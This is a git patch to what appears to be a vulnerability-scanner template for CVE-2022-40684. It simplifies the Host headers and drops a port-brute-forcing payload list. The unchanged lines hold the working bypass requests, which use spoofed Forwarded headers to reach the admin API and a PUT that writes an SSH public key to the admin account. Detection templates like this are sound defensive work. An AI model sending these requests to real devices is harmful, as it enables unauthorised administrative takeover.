From 5a33e1b9adbef49ca9a199ca3be30e0b6e1ac2b9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Nov 2022 15:38:24 +0530 Subject: [PATCH] Update CVE-2022-40684.yaml --- cves/2022/CVE-2022-40684.yaml | 16 +++------------- 1 file changed, 3 insertions(+), 13 deletions(-) diff --git a/cves/2022/CVE-2022-40684.yaml b/cves/2022/CVE-2022-40684.yaml index 746663f227..c54235343e 100644 --- a/cves/2022/CVE-2022-40684.yaml +++ b/cves/2022/CVE-2022-40684.yaml @@ -20,14 +20,14 @@ requests: - raw: - | GET /api/v2/cmdb/system/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} + Host: {{Hostname}} User-Agent: Node.js Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host= X-Forwarded-Vdom: root - | PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 - Host: {{Hostname}}:{{port}} + Host: {{Hostname}} User-Agent: Report Runner Content-Type: application/json Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; @@ -36,17 +36,7 @@ requests: { "ssh-public-key1":"{{randstr}}" } - attack: clusterbomb - payloads: - port: - - 443 - - 8443 - - 10443 - - 80 - - 4443 - - 9443 - - 6443 - - 7443 + stop-at-first-match: true req-condition: true matchers-condition: or